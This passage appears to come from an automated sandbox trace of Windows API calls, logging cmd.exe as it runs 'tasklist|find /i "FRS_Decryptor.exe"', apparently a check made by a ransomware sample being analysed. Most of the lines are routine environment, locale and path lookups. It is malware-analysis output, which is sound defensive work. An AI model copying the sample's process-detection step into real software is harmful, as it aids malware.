lpType=0xf0eb14, lpData=0xf0eb18, lpcbData=0xf0eb10*=0x1000 | out: lpType=0xf0eb14*=0x0, lpData=0xf0eb18*=0x9, lpcbData=0xf0eb10*=0x1000) returned 0x2 [0145.960] RegCloseKey (hKey=0x44) returned 0x0 [0145.960] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500bd [0145.960] srand (_Seed=0x5aa500bd) [0145.960] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0145.960] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0145.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0145.961] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xfb40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0145.961] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.961] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.961] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0145.961] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.961] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.961] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0145.961] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0145.961] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0145.961] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0145.961] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0145.961] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0145.961] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0145.961] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0145.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf0f8ec | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0145.962] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xf0f8ec, lpFilePart=0xf0f8e8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f8e8*="Desktop") returned 0x1c [0145.962] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0145.962] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf0f668 | out: lpFindFileData=0xf0f668) returned 0xfb42d8 [0145.962] FindClose (in: hFindFile=0xfb42d8 | out: hFindFile=0xfb42d8) returned 1 [0145.962] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xf0f668 | out: lpFindFileData=0xf0f668) returned 0xfb42d8 [0145.962] FindClose (in: hFindFile=0xfb42d8 | out: hFindFile=0xfb42d8) returned 1 [0145.962] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0145.962] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xf0f668 | out: lpFindFileData=0xf0f668) returned 0xfb42d8 [0145.962] FindClose (in: hFindFile=0xfb42d8 | out: hFindFile=0xfb42d8) returned 1 [0145.962] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0145.963] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0145.963] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0145.963] GetEnvironmentStringsW () returned 0xfb6190* [0145.963] FreeEnvironmentStringsA (penv="=") returned 1 [0145.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0145.963] GetConsoleOutputCP () returned 0x1b5 [0145.964] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0145.964] GetUserDefaultLCID () returned 0x409 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf0fa18, cchData=128 | out: lpLCData="0") returned 2 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf0fa18, cchData=128 | out: lpLCData="0") returned 2 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf0fa18, cchData=128 | out: lpLCData="1") returned 2 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0145.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0145.965] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0145.965] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0145.965] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0145.965] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0145.965] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0145.965] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0145.965] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0145.966] GetConsoleTitleW (in: lpConsoleTitle=0xfb4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0145.966] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0145.966] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0145.966] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0145.966] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0145.967] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0145.967] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0145.967] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0145.967] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0145.968] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0145.968] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0145.968] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0145.968] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0145.968] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0145.968] _wcsicmp (_String1="IF", _String2="find") returned 3 [0145.968] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0145.968] _wcsicmp (_String1="REM", _String2="find") returned 12 [0145.968] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0145.970] _pipe (in: _PtHandles=0xfb51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xfb51f0) returned 0 [0145.970] _dup (_FileHandle=1) returned 5 [0145.970] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0145.970] _close (_FileHandle=4) returned 0 [0145.970] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0145.970] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0145.970] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0145.971] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0145.971] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0145.971] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0145.971] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0145.971] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0145.971] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0145.971] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0145.971] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0145.971] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0145.971] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0145.971] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0145.971] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0145.971] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0145.971] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0145.971] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0145.971] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0145.971] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0145.971] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0145.971] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0145.971] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0145.971] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0145.971] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0145.971] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0145.971] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0145.971] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0145.971] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0145.971] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0145.971] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0145.971] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0145.971] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0145.971] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0145.971] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0145.971] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0145.971] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0145.972] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0145.972] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0145.972] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0145.972] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0145.972] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0145.972] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0145.972] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0145.972] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0145.972] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0145.972] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0145.972] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0145.972] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0145.972] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0145.972] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0145.972] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0145.972] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0145.972] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0145.972] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0145.972] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0145.972] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0145.972] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0145.972] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0145.972] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0145.972] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0145.972] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0145.972] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0145.972] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0145.972] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0145.972] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0145.972] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0145.972] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0145.972] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0145.972] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0145.972] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0145.972] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0145.972] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0145.972] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0145.972] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0145.972] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0145.973] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0145.973] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0145.973] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0145.973] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0145.973] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0145.973] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0145.973] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0145.973] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0145.973] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0145.973] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0145.973] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0145.973] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0145.973] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0145.973] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0145.973] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0145.973] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0145.973] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0145.973] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0145.973] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0145.973] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0145.973] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0145.973] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0145.973] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0145.973] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0145.973] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0145.973] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0145.973] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0145.974] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0145.974] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0145.974] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0145.974] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0145.974] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0145.974] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0145.974] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0145.974] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0145.974] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0145.974] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0145.974] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0145.974] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0145.974] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0145.974] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0145.974] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0145.974] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0145.974] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0145.974] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0145.974] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0145.974] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0145.974] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0145.974] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0145.974] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0145.974] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0145.974] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0145.974] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0145.974] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0145.975] SetErrorMode (uMode=0x0) returned 0x0 [0145.975] SetErrorMode (uMode=0x1) returned 0x0 [0145.975] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfb5228, lpFilePart=0xf0f874 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f874*="Desktop") returned 0x1c [0145.975] SetErrorMode (uMode=0x0) returned 0x1 [0145.975] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.975] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.981] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.982] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.982] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xffffffff [0145.982] GetLastError () returned 0x2 [0145.982] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.982] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xfb5530 [0145.982] FindClose (in: hFindFile=0xfb5530 | out: hFindFile=0xfb5530) returned 1 [0145.983] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xffffffff [0145.983] GetLastError () returned 0x2 [0145.983] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f600, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f600) returned 0xfb5530 [0145.983] FindClose (in: hFindFile=0xfb5530 | out: hFindFile=0xfb5530) returned 1 [0145.983] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.983] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.983] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0145.983] SetErrorMode (uMode=0x0) returned 0x0 [0145.983] SetErrorMode (uMode=0x1) returned 0x0 [0145.983] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfba3c0, lpFilePart=0xf0f61c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f61c*="Desktop") returned 0x1c [0145.983] SetErrorMode (uMode=0x0) returned 0x1 [0145.983] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.984] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.984] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.984] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.984] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xffffffff [0145.984] GetLastError () returned 0x2 [0145.984] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.984] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xfb5628 [0145.984] FindClose (in: hFindFile=0xfb5628 | out: hFindFile=0xfb5628) returned 1 [0145.984] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xffffffff [0145.985] GetLastError () returned 0x2 [0145.985] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f3a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f3a8) returned 0xfb5628 [0145.985] FindClose (in: hFindFile=0xfb5628 | out: hFindFile=0xfb5628) returned 1 [0145.985] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.985] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.985] GetConsoleTitleW (in: lpConsoleTitle=0xf0f8a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0145.985] InitializeProcThreadAttributeList (in: lpAttributeList=0xf0f7d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf0f7b4 | out: lpAttributeList=0xf0f7d0, lpSize=0xf0f7b4) returned 1 [0145.985] UpdateProcThreadAttribute (in: lpAttributeList=0xf0f7d0, dwFlags=0x0, Attribute=0x60001, lpValue=0xf0f7bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf0f7d0, lpPreviousValue=0x0) returned 1 [0145.985] GetStartupInfoW (in: lpStartupInfo=0xf0f808 | out: lpStartupInfo=0xf0f808*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2e8, hStdError=0x2c)) [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.985] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0145.986] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0145.987] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0145.987] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.988] CreateProcessW (in: 